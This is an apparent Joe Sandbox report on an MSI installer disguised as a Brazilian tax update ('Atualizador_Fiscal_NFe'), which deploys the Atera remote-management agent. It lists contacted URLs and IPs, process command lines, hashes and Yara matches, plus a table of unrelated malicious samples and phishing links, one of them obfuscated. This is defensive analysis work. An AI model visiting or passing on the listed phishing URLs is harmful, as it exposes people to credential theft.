https://my.splashtop.com	AgentPackageSTRemote.exe, 00000021.00000002.2945403740.000002300018B000.00000004.00000800.00020000.00000000.sdmp	false
https://agent-api.atera.com/Production/Agent/recurringCo	AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14AE9C000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/api/v2/package/Temurinjre/21.0.5.11	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/27.10/AgentPackageSystemTools.zip?j1	AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/package/ReportAbuse/openjdk11jre/11.0.16.20220913	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
http://www.abit.com.tw/	AgentPackageMonitoring.exe, 00000024.00000002.2218081700.00000247F89D2000.00000002.00000001.01000000.0000001F.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256805C9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	false
https://chocolatey.org/packages/adoptopenjdkjre):	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/api/v2/package/teamcity-preinstalledjre/2024.12.0	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/package/ReportAbuse/javaruntime-platformspecific/7.0.79.20161125	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/api/v2/Search	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.pndsn.com/v	AteraAgent.exe, 00000018.00000002.2666352179.000002510071B000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/rgra/choco-packages/tree/master/server-jre8	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.atera.com/agentpackagesmac/AgentPackageTaskScheduler/13.0/AgentPackageTaskScheduler.zip	AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/api/v2/package/josm/19265.0.0	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://agent-api.P	AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF496000.00000004.00000800.00020000.00000000.sdmp	false
http://www.w3.o	AteraAgent.exe, 0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp	false
https://www.jetbrains.com/teamcity/documentation/	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
http://mail.openjdk.java.net/mailman/listinfo	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/package/ReportAbuse/server-jre/8.0.192	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/chocolatey/chocolatey-coreteampackages	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCBDE2000.00000002.00000001.01000000.00000044.sdmp	false
https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2dabf02b-2c30-4ed5-8069-cac60b083345	AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/adoptium/temurin17-binaries/releases/download/jdk-17.0.12%2B7/OpenJDK17U-jre_x86-	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/packages/server-jre10/10.0.1	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/nlog/NLog/wiki/Configuration-file#variables	AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/packages/teamcity/2024.12.0	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.pndsn.com/v2/subscribe/	AteraAgent.exe, 0000000E.00000002.2356972366.000001A5000A2000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=dba4e63d-fa85-48f6-b00c-ec5d6483e5eb	AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp	false
https://asciidoctor.org/docs/user-manual/	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://bell-sw.com/	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3024000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB307C000.00000004.00000800.00020000.00000000.sdmp	false
https://flywaydb.org/documentation/releaseNotes	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.atera.com/translations/TicketingTray/	AgentPackageTicketing.exe, 00000031.00000002.2959271020.0000021F24FC2000.00000002.00000001.01000000.0000003C.sdmp	false
https://community.chocolatey.org/package/ReportAbuse/teamcity-preinstalledjre/2024.12.0	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
http://crl.defence.gov.au/pki0	AteraAgent.exe, 0000000E.00000002.2400417114.000001A5724EE000.00000004.00000020.00020000.00000000.sdmp	false
https://gist.github.com/choco-bot/f6ddc5ed017de43b87d59ec377198c00	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	false
HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMONITORING/37.8/AGENTPACKAGEMONITORING.ZIP	AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.atera.com/agentpackagesnet45/AgentPackageInternalPoller/23.8/AgentPackageInternalPoller.z	AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100136000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/adoptium/temurin21-binaries/releases/download/jdk-21.0.5%2B11/OpenJDK21U-jre_x64_	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/packages/TeamCity-PreinstalledJRE)	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.atera.com/agentpackagesne	AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zip?j1lnlDvC8Z	AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/IdealChain/chocolatey-packages/tree/master/josm	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://gist.github.com/choco-bot/718340558c14c0991bf4e341181c78ba	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	false
https://community.chocolatey.org/package/ReportAbuse/adoptopenjdk12jre/12.0.2.10	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	false
https://gist.github.com/choco-bot/50451618ceb903ae34ff3ea4da94e2b9	AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/dfb304ca	AteraAgent.exe, 00000018.00000002.2666352179.000002510071B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	false
https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=1eecf8b3-cc2b-4957-b7fa-87c63e22c68a	AteraAgent.exe, 0000000E.00000002.2356972366.000001A500167000.00000004.00000800.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.222.144.13	unknown	United States	16509	AMAZON-02US	false
40.119.152.241	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
20.86.89.202	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
108.158.75.93	unknown	United States	16509	AMAZON-02US	false
3.160.188.122	unknown	United States	16509	AMAZON-02US	false
104.18.21.76	unknown	United States	13335	CLOUDFLARENETUS	false
192.229.221.95	unknown	United States	15133	EDGECASTUS	false
152.199.23.209	unknown	United States	15133	EDGECASTUS	false
13.232.67.199	unknown	United States	16509	AMAZON-02US	false
20.60.197.1	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.223.39.232	unknown	United States	8987	AMAZONEXPANSIONGB	false
2.22.50.144	unknown	European Union	20940	AKAMAI-ASN1EU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573179
Start date and time:	2024-12-11 16:11:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	63
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Atualizador_Fiscal_NFe_37882912.msi
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winMSI@104/552@0/12
EGA Information:	Successful, ratio: 16.7%
HCA Information:	Successful, ratio: 58% Number of executed functions: 424 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 7664 because it is empty
Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 7788 because it is empty
Execution Graph export aborted for target AgentPackageSTRemote.exe, PID 1524 because it is empty
Execution Graph export aborted for target AteraAgent.exe, PID 2588 because it is empty
Execution Graph export aborted for target AteraAgent.exe, PID 5768 because it is empty
Execution Graph export aborted for target AteraAgent.exe, PID 7836 because it is empty
Execution Graph export aborted for target rundll32.exe, PID 3320 because it is empty
Execution Graph export aborted for target rundll32.exe, PID 344 because it is empty
Execution Graph export aborted for target rundll32.exe, PID 5064 because it is empty
Execution Graph export aborted for target rundll32.exe, PID 7320 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Skipping network analysis since amount of network traffic is too extensive
VT rate limit hit for: Atualizador_Fiscal_NFe_37882912.msi

Simulations

Behavior and APIs

Time	Type	Description
10:12:10	API Interceptor	3x Sleep call for process: rundll32.exe modified
10:12:15	API Interceptor	1928x Sleep call for process: AteraAgent.exe modified
10:12:37	API Interceptor	77x Sleep call for process: AgentPackageAgentInformation.exe modified
10:12:48	API Interceptor	4698x Sleep call for process: AgentPackageSTRemote.exe modified
10:12:52	API Interceptor	95x Sleep call for process: AgentPackageMonitoring.exe modified
10:13:27	API Interceptor	14899x Sleep call for process: AgentPackageTicketing.exe modified
10:13:27	API Interceptor	27x Sleep call for process: AgentPackageHeartbeat.exe modified
10:13:28	API Interceptor	786x Sleep call for process: AgentPackageProgramManagement.exe modified
10:13:51	API Interceptor	7x Sleep call for process: AgentPackageUpgradeAgent.exe modified
15:13:18	Task Scheduler	Run new task: Monitoring Recovery path: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe s>schedulerrun
15:14:26	Autostart	Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce {96ec02bb-b5fa-4892-a305-c6128466beda} "C:\ProgramData\Package Cache\{96ec02bb-b5fa-4892-a305-c6128466beda}\dotnet-runtime-6.0.35-win-x64.exe" /burn.runonce

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	boatnet.sh4.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	Document.xla	Get hash	malicious	Unknown	Browse	54.150.207.131
	Document.xla	Get hash	malicious	Unknown	Browse	54.150.207.131
	https://k24ff6gz45c4x46.s3.us-east-2.amazonaws.com/jju7km098u77gg/jj8hvff47g8iiu8/index.html	Get hash	malicious	Unknown	Browse	52.219.228.34
	Document.xla	Get hash	malicious	Unknown	Browse	54.150.207.131
	https://u48551708.ct.sendgrid.net/ls/click?upn=u001.ztPEaTmy8WofhPYJ48HDSCunUq5pm5yTGRhe-2B0bVSngC8hMYiy6PgMy1xJOG8JJZaOsK-2FG9SE7UmhEzeQSXDmEf7Z3nlXZDH-2BW1HSMP6c8uYUvXDTaJRyLbPDV6bI3nnDyIlM0OJKevMwAF04rpfLmQEYS641NQTMU227kkOtBQgQK-2FNlHeN6DpPMLDgH6kuMS3X_2vbC1nrAFjePip8HYuHYOlkYXiy7Z-2FrO9MQN7lNoEgxRkovUJGAEvKvTFyRmFsa9AQlcDpFhpJzgHajMOC0yWTZOc2DdmxhrlyPvteyXbl8nlhAtf2p-2FHw4RnlZ8cxDY-2BWJeBsszGnsrXuNOI8LpL5ZYI3ad04OdxC8tHHA5tO-2Be1xS3Z9Z3VrOTM-2FT5ptoYnx5N-2FTYKQ13RZ-2FookVMhAtJ6OV43Zayd1qOmHGLwUI8-3D	Get hash	malicious	Phisher	Browse	108.158.75.4
	Document.xla	Get hash	malicious	Unknown	Browse	54.150.207.131
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.com	Get hash	malicious	HTMLPhisher	Browse	13.227.8.47
	https://app.signitic.com/l/aWRMVnlrQ0g4NXZzVTh6eGpEV2N6UT09-MG1ORVZRQWgwZXZXZVQwS3pYcjdDdz09	Get hash	malicious	Unknown	Browse	15.236.57.51
	Shipment Notification.exe	Get hash	malicious	FormBook	Browse	18.141.10.107

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	145968
Entropy (8bit):	5.874150428357998
Encrypted:	false
SSDEEP:	3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
MD5:	477293F80461713D51A98A24023D45E8
SHA1:	E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
SHA-256:	A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
SHA-512:	23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..e.........."...0.............f$... ...@....@.. ...............................1....`..................................$..O....@..,...............0(...`......."............................................... ............... ..H............text...\|.... ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................H$......H.......(...D4..........l!..p.............................................{.....0..N........~......,.~.....+:(.......~....(........(....#.......@....,.(.....+.~.....+.....0..;........(.......(.....1.(.......(........+....,.~.....+.~.....+....0..6........~....%-.&~..........s....%.....s ......o!.....o".......0..O........(...........~#...r...po$..........,..rG..ps%...z.rO..p.....(&....~.....o'....*..0..>........~#...r...po(............,'.~#...r...po$............,.rG..ps%...

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	651
Entropy (8bit):	5.343677015075984
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yiv:ML9E4KlKDE4KhKiKhPKIE4oKNzKoM
MD5:	7EEF860682F76EC7D541A8C1A3494E3D
SHA1:	58D759A845D2D961A5430E429EF777E60C48C87E
SHA-256:	65E958955AC5DBB7D7AD573EB4BB36BFF4A1DC52DD16CF79A5F7A0FA347727F1
SHA-512:	BF7767D55F624B8404240953A726AA616D0CE60EC1B3027710B919D6838EFF7281A79B49B22AB8B065D8CA921EF4D09017A0991CB4A21DAF09B3B43E6698CB04
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
Entropy (8bit):	7.87867526698898
TrID:	Microsoft Windows Installer (60509/1) 57.88% ClickyMouse macro set (36024/1) 34.46% Generic OLE2 / Multistream Compound File (8008/1) 7.66%
File name:	Atualizador_Fiscal_NFe_37882912.msi
File size:	2'994'176 bytes
MD5:	944d3812653ef7cf2708e7366ab11f17
SHA1:	5b6581dfa7611eabad65a5dc4c0db77e264260d4
SHA256:	c1c2d1eb19c0daba80bceb2652e5f7057395acb7001036f354f2438dece3e6fb
SHA512:	6b8e5646282c133bad6516278137bccdfb825e29ee5e323d297c44c98a10de75c69b3fa43bdef5d2a733af6d992eb9301091dd70fad342af5e6c13979a55fc9a
SSDEEP:	49152:5+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:5+lUlz9FKbsodq0YaH7ZPxMb8tT
TLSH:	9BD523127584483AE37B0A358D7AD6A05E7DFE605B70CA8E9308741E2D705C1AB76FB3
File Content Preview:	........................>......................................................................................................................................................................................................................................

Target ID:	0
Start time:	10:12:02
Start date:	11/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Atualizador_Fiscal_NFe_37882912.msi"
Imagebase:	0x7ff6be720000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	10:12:03
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 6CA4322E5D5FFDAF9B5BE54CEFF6E8EF
Imagebase:	0xde0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	10:12:04
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Windows\Installer\MSIAB6C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5746140 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
Imagebase:	0xd10000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000003.1705697487.000000000490A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000002.1766749834.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000002.1766749834.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	10:12:11
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
